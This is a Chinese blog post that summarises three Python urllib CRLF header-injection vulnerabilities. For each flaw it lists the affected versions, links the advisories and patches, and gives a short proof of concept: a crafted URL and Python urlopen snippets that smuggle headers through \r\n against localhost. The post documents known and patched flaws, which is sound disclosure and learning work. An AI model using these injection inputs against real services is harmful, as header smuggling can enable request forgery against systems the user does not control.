Python urllib CRLF注入漏洞小结

最新推荐文章于 2024-06-01 10:35:00 发布
最新推荐文章于 2024-06-01 10:35:00 发布
阅读量623 收藏
点赞数
分类专栏: WEB_安全 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiru9972/article/details/128343676
版权

Python urllib CRLF注入漏洞小结

CVE-2016-5699

https://www.suse.com/security/cve/CVE-2016-5699.html

  • before 2.7.10 and 3.x before 3.4.4
  • POC:
http://127.0.0.1%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo
  • 漏洞&patch源码:https://bugs.python.org/file37264/disable_http_header_injection.patch

在这里插入图片描述
修复前通过\r\n进行拼接,而我们恶意代码通过host带入

CVE-2019-9740

https://nvd.nist.gov/vuln/detail/CVE-2019-9740
https://xz.aliyun.com/t/5123

  • urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3

  • poc

import sys
import urllib
import urllib.request
import urllib.error


host = "127.0.0.1:7777?a=1 HTTP/1.1\r\nCRLF-injection: test\r\nTEST: 123"
url = "http://"+ host + ":8080/test/?test=a"

try:
    info = urllib.request.urlopen(url).info()
    print(info)

except urllib.error.URLError as e:
    print(e)
  • 修复源码:https://github.com/python/cpython/pull/12755/commits/97bcc4bd5cf5c6dc1352d9b5e680db165c937fd1

CVE-2019-9947

https://bugs.python.org/issue35906

  • urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3
  • POC
import urllib.request

urllib.request.urlopen('http://127.0.0.1:1234/?q=HTTP/1.1\r\nHeader: Value\r\nHeader2: \r\n')
or 
urllib.request.urlopen('http://127.0.0.1:1234/HTTP/1.1\r\nHeader: Value\r\nHeader2: \r\n')
_HWHXY
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis 安全汇总小结
snowlyzz的博客
01-30 681
详细介绍Redis的未授权访问漏洞以及其他利用
python urllib3 requests
10-03
python urllib3 requests
CVE-2019-7238.py
10-25
# CVE-2019-7238 Nexus Repository Manager 3 Remote Code Execution without authentication < 3.15.0 found by Rico Tencent Security Yunding Lab and [@voidfyoo](https://twitter.com/voidfyoo)
Python urllib HTTP头注入漏洞
weixin_30298497的博客
03-08 196
virusdefender · 2016/06/17 17:19from:blog.blindspotsecurity.com/2016/06/adv…0x00 总览Pythonurllib库(在Python2中为urllib2,在Python3中为urllib)有一个HTTP协议下的协议流注入漏洞。如果攻击者可以控制Python代码访问任意URL或者让Python代码访问一个恶意的web se...
python sql注入漏洞 ctf_[ACTF]Simple_Python
weixin_39944595的博客
12-09 203
0x00 前言这题让我学习到了很多。不仅是知识,思路也是学习到了很多。下面我就来理一理做题思路。0x01 分析这一题是可以看出来是django框架的。界面有且只有两个输入框。多次测试无果后,其实返回500的话,我不应该以为sql注入没有成功,而是继续使用sleep函数来测试盲注。之后这道题目给出了提示。这一题是一道CVE改编的,那么问题就来了,如果我们面对一道题目没有任何思路的话,我们应该怎么办?...
python代码执行漏洞_Vulnhub-uWSGI 远程代码执行漏洞
weixin_31304817的博客
12-28 301
郑重声明:所用漏洞环境为自建虚拟机vulnhub靶机环境,仅供本人学习使用。漏洞简述uWSGI是一个经常被使用的应用容器,通常情况下由于WSGI是Python实现的标准,所以uWSGI经常作为Python应用容器启动。但实际上uWSGI同样也支持加载Perl/Ruby/Go等应用。uWSGI程序中默认注册了一系列schemes,其中很多都是危险协议,尤其注意到其中有exec协议,可以直接通过刚才的...
Python URL 解析漏洞可导致命令执行攻击
smellycat000的专栏
08-14 293
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Python URL 解析函数中存在一个高危漏洞,可用于绕过通过拦截清单实现的域或协议过滤方法,从而导致任意文件读取和命令执行后果。该漏洞的编号为CVE-2023-24329,CVSS评分为7.5。CERT/CC 在上周五发布安全公告指出,“当整个URL以空字符开头时,urlparse 就会存在一个解析问题。该漏洞影响主机名和图式的解析,最终可导...
Python脚本实现Web漏洞扫描工具
人生苦短, 还不用Python?
04-08 5707
一、使用说明: 1.运行环境: Linux命令行界面+Python2.7 2.程序源码: Vim scanner//建立一个名为scanner的文件 Chmod a+xscanner//修改文件权限为可执行的 3.运行程序: Python scanner//运行文件 若没有携带目标URL信息,界面输出帮助信息,提醒可以可输入的参数。 参数包括: --h 输出帮助信息 --url...
web全套资料 干货满满 各种文章详解
weixin_33961829的博客
09-19 290
sql注入lMySqlMySQL False注入及技巧总结MySQL 注入攻击与防御sql注入学习总结SQL注入防御与绕过的几种姿势MySQL偏门技巧mysql注入可报错时爆表名、字段名、库名高级SQL注入:混淆和绕过MSSQLMSSQL DBA权限获取WEBSHELL的过程MSSQL 注入攻击与防御CLR在SQL Server中的利用技术分析PostgreSQLpostgresql数据库利用...
WEB全套资料 干货满满
锋刃科技的博客
12-20 2217
sql注入 MySqlMySQL False注入及技巧总结MySQL 注入攻击与防御sql注入学习总结 SQL注入防御与绕过的几种姿势MySQL偏门技巧mysql注入可报错时爆表名、字段名、库名高级SQL注入:混淆和绕过 MSSQLMSSQL DBA权限获取WEBSHELL的过程 MSSQL 注入攻击与防御CLR在SQL Server中的利用技术分析 PostgreSQLpostgresql数据库...
python urllib3
04-19
python urllib3 安装文件包
Python urllib urllib模块
02-25
Python urllib urllib2 urllib模块
Python urllib2运行过程原理解析
12-17
urllib2.urlopen(url[, data[, timeout[, cafile[, capath[, cadefault[, context]]]]]) 注: url表示目标网页地址,可以是字符串,也可以是请求对象Request req= urllib2.Request(url, data,headers) response =...
python urllib爬虫模块使用解析
09-18
主要介绍了python urllib爬虫模块使用解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Web-Security-Learning
Grey的博客
01-18 3157
Web-Security-Learning在学习Web安全的过程中整合的一些资料。 该repo会不断更新,最近更新日期为:2017/12/21。同步更新于: chybeta: Web-Security-Learning (带目录) 12月21日更新:新收录文章sql注入SQL注入的“冷门姿势”MySQL绕过WAF实战技巧NetSPI SQL Injection WikiXSSBrowser's X
如何mysql数据导入到mongdb
codemami的博客
05-30 1551
由于MySQL和MongoDB的数据模型不同(例如,MySQL使用关系模型,而MongoDB使用文档模型),你可能需要转换数据的格式。使用MongoDB驱动程序:你也可以使用MongoDB的官方驱动程序(如Python的pymongo)来编写脚本,将数据直接插入到MongoDB中。注意:如果你的JSON文件包含多个文档,并且它们不是作为数组的一部分(即每个文档都在其自己的行上),则需要使用--jsonArray选项。手动转换:对于小型数据集,你可以手动编辑SQL或CSV文件,将其转换为JSON格式。
专属编程笔记
最新发布
u014397365的博客
06-01 995
在软件开发中,Utils(或Utilities)目录通常用于存放一些。这些工具类或函数为整个应用程序或多个模块提供便利的功能支持,使得代码更加模块化、易于维护和重用。UtilsUtils目录的设计目的在于避免代码重复,并确保在整个项目中以一致的方式处理共通任务。这样做可以提高开发效率,降低维护成本,并确保代码的整洁性和可读性。
在linux服务器上使用tensorboard,错误记录
wwwwzm的博客
05-30 1232
1. 使用tensorboard命令时,不是从虚拟环境中找tensorboard,而是从(全局路径)中找(/home/ljx/.local/lib/python3.9/site-packages/tensorboard)是一个在 Unix-like 系统(包括 Linux 和 macOS)的命令行界面(如 Bash shell)中使用的命令。2.使用which命令, 查看使用的tensorboard的路径,发现使用的是全局路径,不是虚拟环境路径。是一个特殊的变量,它定义了操作系统搜索可执行文件的目录。
python urllib
08-17
Pythonurllib库是一个标准库,用于处理URL请求和处理网络资源。它包含了一些模块,如urllib.request、urllib.parse、urllib.error、urllib.robotparser等,用于不同的URL操作和错误处理。 - `urllib.request`模块...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值